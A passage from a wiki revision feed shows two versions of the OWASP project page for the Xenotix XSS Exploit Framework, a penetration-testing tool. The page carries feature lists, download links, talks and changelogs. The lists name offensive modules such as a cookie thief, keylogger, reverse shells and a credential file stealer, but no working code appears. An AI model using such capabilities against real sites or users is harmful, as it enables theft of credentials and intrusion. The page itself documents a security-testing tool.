   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Features =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SCANNER MODULES'''&lt;br /&gt;
&lt;br /&gt;
*GET Request Fuzzer&lt;br /&gt;
*POST Request Fuzzer&lt;br /&gt;
*Advanced Request Fuzzer&lt;br /&gt;
*OAuth 1.0a Request Scanner&lt;br /&gt;
*DOM XSS Analyzer&lt;br /&gt;
*Local DOM XSS Analyzer&lt;br /&gt;
*Hidden Parameter Detector&lt;br /&gt;
&lt;br /&gt;
'''INFORMATION GATHERING MODULES'''&lt;br /&gt;
&lt;br /&gt;
*WAF Fingerprinting&lt;br /&gt;
*Victim Fingerprinting&lt;br /&gt;
**IP to Location&lt;br /&gt;
**IP to GeoLocation&lt;br /&gt;
*Network&lt;br /&gt;
**Network IP (WebRTC)&lt;br /&gt;
**Ping Scan&lt;br /&gt;
**Port Scan&lt;br /&gt;
**Internal Network Scan&lt;br /&gt;
*Browser&lt;br /&gt;
**Fingerprinting&lt;br /&gt;
**Features Detector&lt;br /&gt;
&lt;br /&gt;
'''EXPLOITATION MODULES'''&lt;br /&gt;
&lt;br /&gt;
*Send Message&lt;br /&gt;
*Cookie Thief&lt;br /&gt;
*Keylogger&lt;br /&gt;
*HTML5 DDoSer&lt;br /&gt;
*Load File&lt;br /&gt;
*Grab Page Screenshot&lt;br /&gt;
*JavaScript Shell&lt;br /&gt;
*Reverse HTTP WebShell&lt;br /&gt;
*Metasploit Browser Exploit&lt;br /&gt;
*Social Engineering&lt;br /&gt;
**Phisher&lt;br /&gt;
**Tabnabbing&lt;br /&gt;
**Live WebCam Screenshot&lt;br /&gt;
**Download Spoofer&lt;br /&gt;
**Geolocation HTML5 API&lt;br /&gt;
**Java Applet Drive-By (Windows)&lt;br /&gt;
**Java Applet Drive-By Reverse Shell (Windows)&lt;br /&gt;
**HTA Network Configuration (Windows, IE)&lt;br /&gt;
**HTA Drive-By (Windows, IE)&lt;br /&gt;
**HTA Drive-By Reverse Shell (Windows, IE)&lt;br /&gt;
*Firefox Addons&lt;br /&gt;
**Reverse TCP Shell Addon (Windows, Persistent)&lt;br /&gt;
**Reverse TCP Shell Addon (Linux, Persistent)&lt;br /&gt;
**Session Stealer Addon (Persistent)&lt;br /&gt;
**Keylogger Addon (Persistent)&lt;br /&gt;
**DDoSer Addon (Persistent)&lt;br /&gt;
**Linux Credential File Stealer Addon (Persistent)&lt;br /&gt;
**Drop and Execute Addon (Persistent)&lt;br /&gt;
&lt;br /&gt;
'''AUXILIARY MODULES'''&lt;br /&gt;
*WebKit Developer Tools&lt;br /&gt;
*Encoder/Decoder&lt;br /&gt;
*JavaScript Encoders&lt;br /&gt;
**JSFuck 6 Char Encoder&lt;br /&gt;
**jjencode Encoder&lt;br /&gt;
**aaencode Encoder&lt;br /&gt;
*JavaScript Beautifier&lt;br /&gt;
*Hash Calculator&lt;br /&gt;
*Hash Detector&lt;br /&gt;
*View Injected JavaScript&lt;br /&gt;
*View XSS Payloads&lt;br /&gt;
&lt;br /&gt;
'''XENOTIX SCRIPTING ENGINE'''&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* IronPython Scripting Support&lt;br /&gt;
* Trident and Gecko Web Engine Support&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Conference Talks =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' NULLCON GOA 2013 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J1phYXmLX8w}}&lt;br /&gt;
&lt;br /&gt;
''' CLUBHACK 2012 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|NYZLP0q7-y4}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Screenshots =&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]] &lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]&lt;br /&gt;
|&lt;br /&gt;
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Downloads=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====IMPORTANT====&lt;br /&gt;
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.&lt;br /&gt;
&lt;br /&gt;
====Latest Release====&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip]]&lt;br /&gt;
* Mirror [https://drive.google.com/file/d/0B_Ci-1YbMqshNm5WRlRRTllqcG8/view Download V6.1 From GDrive]&lt;br /&gt;
MD5: 17c703f90dbb4f09b112284232bbb69f&lt;br /&gt;
&lt;br /&gt;
====Requirements====&lt;br /&gt;
* Microsoft .NET Framework 4.5 http://www.microsoft.com/en-in/download/details.aspx?id=30653&lt;br /&gt;
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690 [If you are using Scripting Engine]&lt;br /&gt;
====Older Versions====&lt;br /&gt;
*Version 6 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.zip | MD5: 54a2335e35c47b1e5a87b163088c63ff&lt;br /&gt;
*Version 5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar | MD5: bdfce2d4af4012ecc20b86bed876a54a&lt;br /&gt;
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar&lt;br /&gt;
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar&lt;br /&gt;
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip&lt;br /&gt;
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip&lt;br /&gt;
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip&lt;br /&gt;
====Source====&lt;br /&gt;
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
= Documentation =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Introduction to OWASP Xenotix XSS Exploit Framework'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|C15po4TK4Os}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS in GET Request'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|fPC_stgovcU}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS with GET Request Fuzzer'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|K5nbgvXvY1g}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS with POST Request Fuzzer'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|AqdEG-vsywQ}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS with POST Request Fuzzer in an Authenticated Page'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J_qdm_-XVV0}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS with Advanced Request Fuzzer'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|R8AgEWPFJ1g}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''XSS Filter Bypass, Detection and Explanation with OWASP Xenotix'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|loZSdedJnqc}}&lt;br /&gt;
&lt;br /&gt;
'''Version 4.5 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|jm1-_nTlhzY}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 4 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|dCo5BCJWOdA}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 3 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|CJEgO4_kd-8}} &lt;br /&gt;
{{#ev:youtube|owfF9C_Xerw}} &lt;br /&gt;
{{#ev:youtube|i8c3kf4t6A8}} &lt;br /&gt;
{{#ev:youtube|IT-8IH3yRrA}} &lt;br /&gt;
{{#ev:youtube|cgLGgVWvi9Y}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
''' WHAT'S NEW! '''&lt;br /&gt;
==V6.1 Changes==&lt;br /&gt;
* Bug Fixes&lt;br /&gt;
* Updated QuickPHP Server&lt;br /&gt;
* Local DOM XSS Analyzer&lt;br /&gt;
{{#ev:youtube|RhGVuus_NJw}}&lt;br /&gt;
==V6 Changes==&lt;br /&gt;
&lt;br /&gt;
* Intelli Fuzzer&lt;br /&gt;
* Context Based Fuzzer&lt;br /&gt;
* Blind Fuzzer&lt;br /&gt;
* HTA Network Configuration&lt;br /&gt;
* HTA Drive-By&lt;br /&gt;
* HTA Drive-By Reverse Shell&lt;br /&gt;
* JSFuck 6 Char Encoder&lt;br /&gt;
* jjencode Encoder&lt;br /&gt;
* aaencode Encoder&lt;br /&gt;
* IP to Location&lt;br /&gt;
* IP to GeoLocation&lt;br /&gt;
* IP Hinting&lt;br /&gt;
* Download Spoofer&lt;br /&gt;
* HTML5 Geolocation API&lt;br /&gt;
* Reverse TCP Shell Addon (Linux)&lt;br /&gt;
* OAuth 1.0a Request Scanner&lt;br /&gt;
* 4800+ Payloads&lt;br /&gt;
* SSL Error Fixed&lt;br /&gt;
&lt;br /&gt;
==V5 Changes==&lt;br /&gt;
* Xenotix Scripting Engine&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* V4.5 Bug Fixes&lt;br /&gt;
* GET Network IP (Information Gathering)&lt;br /&gt;
* QR Code Generator for Xenotix xook&lt;br /&gt;
* HTML5 WebCam Screenshot(Exploitation Module)&lt;br /&gt;
* HTML5 Get Page Screenshot (Exploitation Module)&lt;br /&gt;
* Find Feature in View Source.&lt;br /&gt;
* Improved Payload Count to 1630&lt;br /&gt;
* Name Changes&lt;br /&gt;
 &lt;br /&gt;
==V4.5 Changes==&lt;br /&gt;
&lt;br /&gt;
* JavaScript Beautifier&lt;br /&gt;
* Pause and Resume support for Scan&lt;br /&gt;
* Jump to Payload&lt;br /&gt;
* Cookie Support for POST Request&lt;br /&gt;
* Cookie Support and Custom Headers for Header Scanner &lt;br /&gt;
* Added TRACE method Support&lt;br /&gt;
* Improved Interface&lt;br /&gt;
* Better Proxy Support &lt;br /&gt;
* WAF Fingerprinting&lt;br /&gt;
* Load Files &amp;lt;exploitation module&amp;gt;&lt;br /&gt;
* Hash Calculator&lt;br /&gt;
* Hash Detector&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= XSS Protection Cheat Sheet =&lt;br /&gt;
&lt;br /&gt;
[[Image:Xss_protection.png|center]]&lt;br /&gt;
&lt;br /&gt;
The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.&lt;br /&gt;
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.&lt;br /&gt;
&lt;br /&gt;
VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&amp;amp;amp;pid=explorer&amp;amp;amp;efh=false&amp;amp;amp;a=v&amp;amp;amp;chrome=false&amp;amp;amp;embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]			&lt;br /&gt;
&lt;br /&gt;
= Get Involved =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Involvement in the development of Xenotix is highly encouraged!&lt;br /&gt;
&lt;br /&gt;
Here are some of the ways you can help:&lt;br /&gt;
&lt;br /&gt;
==Support Us==&lt;br /&gt;
&lt;br /&gt;
*Twitter Page: [https://twitter.com/Xenotix Xenotix on Twitter]&lt;br /&gt;
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]&lt;br /&gt;
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013  Xenotix @ OpenSecurity]]&lt;br /&gt;
&lt;br /&gt;
==Feedback &amp;amp; Queries==&lt;br /&gt;
&lt;br /&gt;
* Do you have any issues with it?&lt;br /&gt;
* Do you find any design flows or errors?&lt;br /&gt;
* Do you need help in using it?&lt;br /&gt;
* Do you have something to tell about it?&lt;br /&gt;
&lt;br /&gt;
Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform&lt;br /&gt;
&lt;br /&gt;
==Development==&lt;br /&gt;
&lt;br /&gt;
Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org''' &lt;br /&gt;
If you actively contribute to Xenotix then you will be invited to join the project. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]&lt;br /&gt;
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=186111</id>
		<title>OWASP Xenotix XSS Exploit Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=186111"/>
				<updated>2014-11-28T09:34:36Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: /* QUICK DOWNLOAD */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:20px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Xenotix XSS Exploit Framework 6==&lt;br /&gt;
&lt;br /&gt;
[[Image:Xen6.png|left|550px]]&lt;br /&gt;
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.&lt;br /&gt;
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;OWASP Xenotix XSS Exploit Framework&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== LICENSING ==&lt;br /&gt;
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== PRESENTATIONS ==&lt;br /&gt;
&lt;br /&gt;
'''DEFCON DCG Banglore 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]&lt;br /&gt;
&lt;br /&gt;
'''BlackHat Europe Arsenal 2013'''&lt;br /&gt;
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
'''ClubHack 2012'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]&lt;br /&gt;
&lt;br /&gt;
== PROJECT LEADER ==&lt;br /&gt;
&lt;br /&gt;
Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]&lt;br /&gt;
&lt;br /&gt;
== PROJECT WEBSITE ==&lt;br /&gt;
&lt;br /&gt;
*http://xenotix.in&lt;br /&gt;
&lt;br /&gt;
== AWARDS ==&lt;br /&gt;
&lt;br /&gt;
[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]&lt;br /&gt;
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== QUICK DOWNLOAD ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.zip]]&lt;br /&gt;
&lt;br /&gt;
== NEWS AND EVENTS ==&lt;br /&gt;
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released&lt;br /&gt;
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released&lt;br /&gt;
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]&lt;br /&gt;
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]&lt;br /&gt;
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]&lt;br /&gt;
&lt;br /&gt;
== RELATED PROJECTS ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Xelenium_Project]]&lt;br /&gt;
* [[ZAP]]&lt;br /&gt;
* [[OWASP_XSSER]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== CLASSIFICATIONS ==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Features =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SCANNER MODULES'''&lt;br /&gt;
&lt;br /&gt;
*GET Request Manual Mode&lt;br /&gt;
*GET Request Auto Mode&lt;br /&gt;
*Multiple Parameter Scanner&lt;br /&gt;
*GET Request Fuzzer&lt;br /&gt;
*POST Request Fuzzer&lt;br /&gt;
*Advanced Request Fuzzer&lt;br /&gt;
*OAuth 1.0a Request Scanner&lt;br /&gt;
*DOM Scanner&lt;br /&gt;
*Hidden Parameter Detector&lt;br /&gt;
&lt;br /&gt;
'''INFORMATION GATHERING MODULES'''&lt;br /&gt;
&lt;br /&gt;
*WAF Fingerprinting&lt;br /&gt;
*Victim Fingerprinting&lt;br /&gt;
**IP to Location&lt;br /&gt;
**IP to GeoLocation&lt;br /&gt;
*Network&lt;br /&gt;
**Network IP (WebRTC)&lt;br /&gt;
**Ping Scan&lt;br /&gt;
**Port Scan&lt;br /&gt;
**Internal Network Scan&lt;br /&gt;
*Browser&lt;br /&gt;
**Fingerprinting&lt;br /&gt;
**Features Detector&lt;br /&gt;
&lt;br /&gt;
'''EXPLOITATION MODULES'''&lt;br /&gt;
&lt;br /&gt;
*Send Message&lt;br /&gt;
*Cookie Thief&lt;br /&gt;
*Keylogger&lt;br /&gt;
*HTML5 DDoSer&lt;br /&gt;
*Load File&lt;br /&gt;
*Grab Page Screenshot&lt;br /&gt;
*JavaScript Shell&lt;br /&gt;
*Reverse HTTP WebShell&lt;br /&gt;
*Metasploit Browser Exploit&lt;br /&gt;
*Social Engineering&lt;br /&gt;
**Phisher&lt;br /&gt;
**Tabnabbing&lt;br /&gt;
**Live WebCam Screenshot&lt;br /&gt;
**Download Spoofer&lt;br /&gt;
**Geolocation HTML5 API&lt;br /&gt;
**Java Applet Drive-By (Windows)&lt;br /&gt;
**Java Applet Drive-By Reverse Shell (Windows)&lt;br /&gt;
**HTA Network Configuration (Windows, IE)&lt;br /&gt;
**HTA Drive-By (Windows, IE)&lt;br /&gt;
**HTA Drive-By Reverse Shell (Windows, IE)&lt;br /&gt;
*Firefox Addons&lt;br /&gt;
**Reverse TCP Shell Addon (Windows, Persistent)&lt;br /&gt;
**Reverse TCP Shell Addon (Linux, Persistent)&lt;br /&gt;
**Session Stealer Addon (Persistent)&lt;br /&gt;
**Keylogger Addon (Persistent)&lt;br /&gt;
**DDoSer Addon (Persistent)&lt;br /&gt;
**Linux Credential File Stealer Addon (Persistent)&lt;br /&gt;
**Drop and Execute Addon (Persistent)&lt;br /&gt;
&lt;br /&gt;
'''AUXILIARY MODULES'''&lt;br /&gt;
*WebKit Developer Tools&lt;br /&gt;
*Encoder/Decoder&lt;br /&gt;
*JavaScript Encoders&lt;br /&gt;
**JSFuck 6 Char Encoder&lt;br /&gt;
**jjencode Encoder&lt;br /&gt;
**aaencode Encoder&lt;br /&gt;
*JavaScript Beautifier&lt;br /&gt;
*Hash Calculator&lt;br /&gt;
*Hash Detector&lt;br /&gt;
*View Injected JavaScript&lt;br /&gt;
*View XSS Payloads&lt;br /&gt;
&lt;br /&gt;
'''XENOTIX SCRIPTING ENGINE'''&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* IronPython Scripting Support&lt;br /&gt;
* Trident and Gecko Web Engine Support&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Conference Talks =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' NULLCON GOA 2013 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J1phYXmLX8w}}&lt;br /&gt;
&lt;br /&gt;
''' CLUBHACK 2012 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|NYZLP0q7-y4}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Screenshots =&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]] &lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]&lt;br /&gt;
|&lt;br /&gt;
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Downloads=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====IMPORTANT====&lt;br /&gt;
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.&lt;br /&gt;
&lt;br /&gt;
====Latest Release====&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.zip]]&lt;br /&gt;
* Mirror [https://drive.google.com/file/d/0B_Ci-1YbMqshX2VsRG4tLUp3MzQ/view?usp=sharing Download V6 From GDrive]&lt;br /&gt;
MD5: 54a2335e35c47b1e5a87b163088c63ff&lt;br /&gt;
&lt;br /&gt;
====Requirements====&lt;br /&gt;
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718&lt;br /&gt;
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690 [If you are using Scripting Engine]&lt;br /&gt;
====Older Versions====&lt;br /&gt;
*Version 5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar | MD5: bdfce2d4af4012ecc20b86bed876a54a&lt;br /&gt;
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar&lt;br /&gt;
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar&lt;br /&gt;
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip&lt;br /&gt;
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip&lt;br /&gt;
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip&lt;br /&gt;
